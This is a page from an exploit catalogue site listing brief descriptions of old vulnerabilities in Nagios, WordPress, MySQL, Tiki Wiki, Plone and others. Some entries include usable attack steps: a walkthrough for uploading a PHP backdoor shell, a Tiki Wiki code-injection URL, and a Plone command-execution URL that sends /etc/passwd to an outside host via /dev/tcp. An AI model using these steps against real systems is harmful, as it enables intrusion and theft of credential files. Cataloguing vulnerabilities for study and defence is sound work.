header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Nagios Plugin ‘check_ups’ local buffer overflow

A buffer overflow vulnerability was discovered in the Nagios Plugin 'check_ups' which can be exploited by an attacker to execute arbitrary code on the vulnerable system. The vulnerability is caused due to a boundary error when handling user-supplied input. By supplying a specially crafted argument to the '-u' option, an attacker can cause a stack-based buffer overflow and gain control of the execution flow of the application.

Free Image Hosting Script Remote File Upload Vulnerability

This exploit allows hackers to upload a PHP backdoor into "/pictures/" directory via the use of Live HTTP Headers (Firefox Addon). Tools Needed: Live HTTP Headers, Backdoor Shell. Step 1: Locate upload form on index page. Step 2: Rename your shell to shell.php.jpg and start capturing data with Live HTTP Headers. Step 3: Enter tags for the image (can be anything). Step 4: Replay data with Live HTTP Headers - Step 5: Change [Content-Disposition: form-data; name="image1"; filename="shell.php.jpg"rn] to [Content-Disposition: form-data; name="image1"; filename="shell.php"rn]. Step 6: Locate pictures directory: www.site.tld/imagehostingscript/pictures/ (usually). Step 7: Find PHP file (random digits.php) = should look like (321879194bc8ff2843bf7b63a666f665.php). Step 8: Navigate to backdoor = www.site.tld/imagehostingscript/pictures/321879194bc8ff2843bf7b63a666f665.php

Mailing List plugin for WordPress Arbitrary file download

Unauthorized users can download arbitrary files from the server using this exploit. The bug is in config.php, but accessible from other file. The PoC involves setting up a MySQL database, creating a table with a specific structure, adding a raw into the database, and calling the script with database parameters and file id to download.

Windows 2008 SP2 RC2 Explorer Go Byebye :P & Windows 7 Pro SP1 Explorer Go Byebye :P

This exploit is a directory traversal vulnerability which allows an attacker to delete files and directories outside of the intended directory. The exploit is triggered by creating a directory named 'trigger_alt' and a subdirectory named '....' in the root directory of the system. The attacker then uses the SHFileOperation function to delete the 'trigger_alt' directory, which in turn deletes the '....' directory and any other files or directories outside of the intended directory.

MySQL 5.5.8 Null Ptr (windows)

This exploit is a buffer overflow vulnerability in MySQL 5.5.8 on Windows. It allows an attacker to send a specially crafted packet to the MySQL server, which will cause a null pointer dereference and crash the server. The exploit is triggered by sending two specially crafted packets to the MySQL server, the first packet contains a null byte followed by a 4 byte integer, and the second packet contains a specially crafted string. The exploit is triggered when the server attempts to process the second packet.

Open Conference/Journal/Harvester Systems <= 2.3.X multiple remote code execution vulnerabilities

There is a few file upload vulnerabilities in the administrative interfaces of these applications that are unprotected and allow any peepz to CSRF it.

Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection

The vulnerable code is located into /lib/wiki-plugins/wikiplugin_snarf.php: input passed through $_REQUEST['regex'] is checked by a regular expression at line 171 to prevent execution of arbitrary PHP code using the 'e' modifier in a call to preg_replace() at line 172. But this check could be bypassed with a null byte injection, requesting an URL like this: http://<hostname>/tiki-8.2/snarf_ajax.php?url=1&regexres=phpinfo()&regex=//e%00/. Tiki internal filters remove all null bytes from user input, but for some strange reason this doesn't happen within admin sessions. So, successful exploitation of this vulnerability requires an user account with administration rights and 'PluginSnarf' to be enabled (not by default).

Plone – Remote Command Execution

You can execute any command on the remote Plone server with the following request if the server is Unix/Linux based (Note: you won't get returned the results of the command): http://PLONE_SITE/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=<command to run>. For example, to listen for a connection, the attacker can use the command 'nc -l 4040' and on the victim, visit http://victim/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=cat%20/etc/passwd%20%20%3E%20/dev/tcp/172.20.6.218/4040

Recent Exploits: